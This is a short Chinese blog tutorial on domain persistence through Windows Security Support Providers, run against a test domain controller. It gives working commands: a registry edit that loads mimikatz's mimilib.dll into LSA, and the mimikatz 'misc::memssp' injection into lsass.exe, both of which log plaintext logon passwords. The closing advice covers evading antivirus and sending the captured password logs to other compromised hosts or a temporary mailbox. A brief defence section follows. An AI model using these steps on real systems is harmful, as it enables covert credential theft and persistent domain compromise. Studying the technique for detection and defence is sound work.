域渗透|域权限维持之SSP
作者:r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
0x00 测试环境
域控服务器:Win-2008DC—10.10.10.30
域:god.com
0x01 前言
SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。
当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。
当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。
0x02 利用
方法一、修改注册表扩展功能
1、首先将mimikatz中的 mimilib.dll 传到目标域控的c:\windows\system32\目录下,使用dll的位数与目标操作系统保持一致。
2、修改注册表,在键值Security Packages下添加 mimilib.dll,系统重启后会记录登陆密码。
reg query HKLM\System\CurrentControlSet\Control\Lsa /v "Security Package"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
修改成功后的注册表如下图所示:
3、重启目标系统,重启后有用户登陆到当前系统,会在c:\windows\system32\目录下生成一个记录登陆账号密码的kiwissp.log文件。
方法二、进程注入lsass.exe
1、使用mimikatz对lsass.exe进程注入,会在C:\Windows\System32\生成一个mimilsa.log日志文件,里面包含当前登陆的明文密码。
privilege::debug
misc::memssp
0x03 总结
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,前提需要做好免杀,并且可以尝试利用把生成的日志密码文件发送到其他内网被控机器或者临时邮箱。
0x04 防御
对于两种方法的详细分析,在防御策略上也要根据攻击步骤进行防御:首先检查注册表中HKLM\System\CurrentControlSet\Control\Lsa\Security Packages项中是否含有可疑的DLL文件、再检查C:\Windows\System32\目录下是否存在可疑的DLL文件,最后可以使用第三方的工具来查看LSA中是否存在可疑DLL文件。
0x05 了解更多安全知识
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!